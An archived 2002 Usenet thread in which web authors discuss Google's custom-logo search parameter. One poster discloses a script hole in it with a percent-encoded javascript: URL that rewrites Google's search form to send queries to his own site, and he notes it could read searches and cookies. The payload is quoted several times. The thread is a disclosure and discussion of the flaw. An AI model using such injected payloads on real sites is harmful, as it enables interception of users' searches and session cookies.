Google Groups no longer supports new Usenet posts or subscriptions. Historical content remains viewable.
Dismiss

I'm stuck over something simple ... repeating a background image

3 views
Skip to first unread message

Simon Avery

unread,
May 15, 2002, 5:28:23 PM5/15/02
to
XC: #UK.NET.WEB.AUTHORING #ZZ_OUTBOUND
NS <webm...@newsservers.co.uk.INVALID> wrote:

Hello NS

N> The commentators on the ITV website are spitting blood .

What an odd search engine they've got on that page.

Refers query direct to google.com, but replaces the google graphic
with the ITV one.

I wonder if Google know?

And I wanted to search /their/ site, not the whole sodding internet.

--
Simon Avery, Devon, UK
Opinions expressed are mine, not my employers.
Working for the Mare & Foal Sanctuary;
http://www.mareandfoal.org/
Personal: http://www.digdilem.org/

Jim Ley

unread,
May 16, 2002, 5:45:07 AM5/16/02
to
On Wed, 15 May 2002 21:28:23 GMT, SPAM.B....@digdilem.org (Simon
Avery) wrote:

>XC: #UK.NET.WEB.AUTHORING #ZZ_OUTBOUND
>NS <webm...@newsservers.co.uk.INVALID> wrote:
>
>Hello NS
>
> N> The commentators on the ITV website are spitting blood .
>
>What an odd search engine they've got on that page.
>
>Refers query direct to google.com, but replaces the google graphic
>with the ITV one.

Google have a feature, that let you put any image at the top of
google:

Here's Google with my shepherds image...

<URL:
http://www.google.com/custom?cof=L:http://jibbering.com/imgs/shepherds.jpg
>

and here's a hijacked Google search where it's routed to my site...

<URL:
http://www.google.com/custom?cof=L:%6a%61%76%61%73%63%72%69%70%74%3a%77%69%6e%64%6f%77%2e%6f%6e%6c%6f%61%64%3d%66%75%6e%63%74%69%6f%6e%28%29%7b%64%6f%63%75%6d%65%6e%74%2e%66%6f%72%6d%73%5b%30%5d%2e%61%63%74%69%6f%6e%3d%27%68%74%74%70%3a%2f%2f%6a%69%62%62%65%72%69%6e%67%2e%63%6f%6d%2f%73%2e%31%27%7d
>

I'd suggest even the first is a bug, the second is definately a script
hole - the script hole isn't particularly serious as long as you don't
give google any private information...

Jim.

D.M. Procida

unread,
May 16, 2002, 1:40:24 PM5/16/02
to
Jim Ley <j...@jibbering.com> wrote:

> Here's Google with my shepherds image...
>
> <URL:
> http://www.google.com/custom?cof=L:http://jibbering.com/imgs/shepherds.jpg
>
>
> and here's a hijacked Google search where it's routed to my site...
>
> <URL:
> http://www.google.com/custom?cof=L:%6a%61%76%61%73%63%72%69%70%74%3a%77%69
> %6e%64%6f%77%2e%6f%6e%6c%6f%61%64%3d%66%75%6e%63%74%69%6f%6e%28%29%7b%64%6
> f%63%75%6d%65%6e%74%2e%66%6f%72%6d%73%5b%30%5d%2e%61%63%74%69%6f%6e%3d%27%
> 68%74%74%70%3a%2f%2f%6a%69%62%62%65%72%69%6e%67%2e%63%6f%6d%2f%73%2e%31%27
> %7d
>
>
> I'd suggest even the first is a bug, the second is definately a script
> hole - the script hole isn't particularly serious as long as you don't
> give google any private information...

What do you mean? I couldn't see what exactly it was that I'm supposed
to be seeing in the second example.

Daniele
--
Apple Juice. Macintosh service, support and sales, Cardiff
www.apple-juice.co.uk 029 2041 0050
Are you good at web design/development & Mac support? Would
you like to earn a living doing it in Cardiff? Get in touch.

Jim Ley

unread,
May 16, 2002, 1:53:56 PM5/16/02
to
On Thu, 16 May 2002 18:40:24 +0100, {$usenet$}@apple-juice.co.uk (D.M.
Procida) wrote:

>Jim Ley <j...@jibbering.com> wrote:

>>
>> I'd suggest even the first is a bug, the second is definately a script
>> hole - the script hole isn't particularly serious as long as you don't
>> give google any private information...
>
>What do you mean? I couldn't see what exactly it was that I'm supposed
>to be seeing in the second example.

Assuming you're using IE or Mozilla on windows and probably other
systems (they need to support javascript: pseudo protocol for images )
and have scripting enabled it, the second example will send all
searches to a page on jibbering.com

Jim.

Peter Robinson

unread,
May 16, 2002, 2:20:28 PM5/16/02
to
In article <1fcah58.1dap0jttygdogN%{$usenet$}@apple-juice.co.uk>,

{$usenet$}@apple-juice.co.uk (D.M. Procida) wrote:

> Jim Ley <j...@jibbering.com> wrote:
>
> > here's a hijacked Google search where it's routed to my site...
> >
> > <URL:
> > http://www.google.com/custom?cof=L:%6a%61%76%61%73%63%72%69%70%74%3a%77%69
> > %6e%64%6f%77%2e%6f%6e%6c%6f%61%64%3d%66%75%6e%63%74%69%6f%6e%28%29%7b%64%6
> > f%63%75%6d%65%6e%74%2e%66%6f%72%6d%73%5b%30%5d%2e%61%63%74%69%6f%6e%3d%27%
> > 68%74%74%70%3a%2f%2f%6a%69%62%62%65%72%69%6e%67%2e%63%6f%6d%2f%73%2e%31%27
> > %7d

[...]

> > definately a script hole - the script hole isn't particularly
> > serious as long as you don't give google any private information...
>
> What do you mean? I couldn't see what exactly it was that I'm supposed
> to be seeing in the second example.

Go to google.com and search for "apple-juice.co.uk". Then try doing it
via Jim's link.

Peter

D.M. Procida

unread,
May 16, 2002, 2:27:45 PM5/16/02
to
Peter Robinson <pmrob...@mail.com> wrote:

> > > here's a hijacked Google search where it's routed to my site...
> > >
> > > <URL:
> > > http://www.google.com/custom?cof=L:%6a%61%76%61%73%63%72%69%70%74%3a%77%69
> > > %6e%64%6f%77%2e%6f%6e%6c%6f%61%64%3d%66%75%6e%63%74%69%6f%6e%28%29%7b%64%6
> > > f%63%75%6d%65%6e%74%2e%66%6f%72%6d%73%5b%30%5d%2e%61%63%74%69%6f%6e%3d%27%
> > > 68%74%74%70%3a%2f%2f%6a%69%62%62%65%72%69%6e%67%2e%63%6f%6d%2f%73%2e%31%27
> > > %7d
>
> [...]
>
> > > definately a script hole - the script hole isn't particularly
> > > serious as long as you don't give google any private information...
> >
> > What do you mean? I couldn't see what exactly it was that I'm supposed
> > to be seeing in the second example.
>
> Go to google.com and search for "apple-juice.co.uk". Then try doing it
> via Jim's link.

Right - I get a slightly different set of results, presumably because
the search from Jim's link included some of search preferences in it.

But I don't understand why it's a problem, or could be.

D.M. Procida

unread,
May 16, 2002, 2:27:56 PM5/16/02
to
Jim Ley <j...@jibbering.com> wrote:

> Assuming you're using IE or Mozilla on windows and probably other
> systems (they need to support javascript: pseudo protocol for images )
> and have scripting enabled it, the second example will send all
> searches to a page on jibbering.com

You mean, it will tell you what I'm searching for, without my noticing
it?

Jim Ley

unread,
May 16, 2002, 5:34:38 PM5/16/02
to
On Thu, 16 May 2002 19:27:45 +0100, {$usenet$}@apple-juice.co.uk (D.M.
Procida) wrote:

>Peter Robinson <pmrob...@mail.com> wrote:
>
>Right - I get a slightly different set of results, presumably because
>the search from Jim's link included some of search preferences in it.
>
>But I don't understand why it's a problem, or could be.

Like many security problems it doesn't effect all browsers, so
obviously doesn't work with yours, on win32 IE it redirects the search
to a page on my website. As I can execute script in the context of
google, I can get any information you tell google, your searches, your
cookies.

Jim.

0 new messages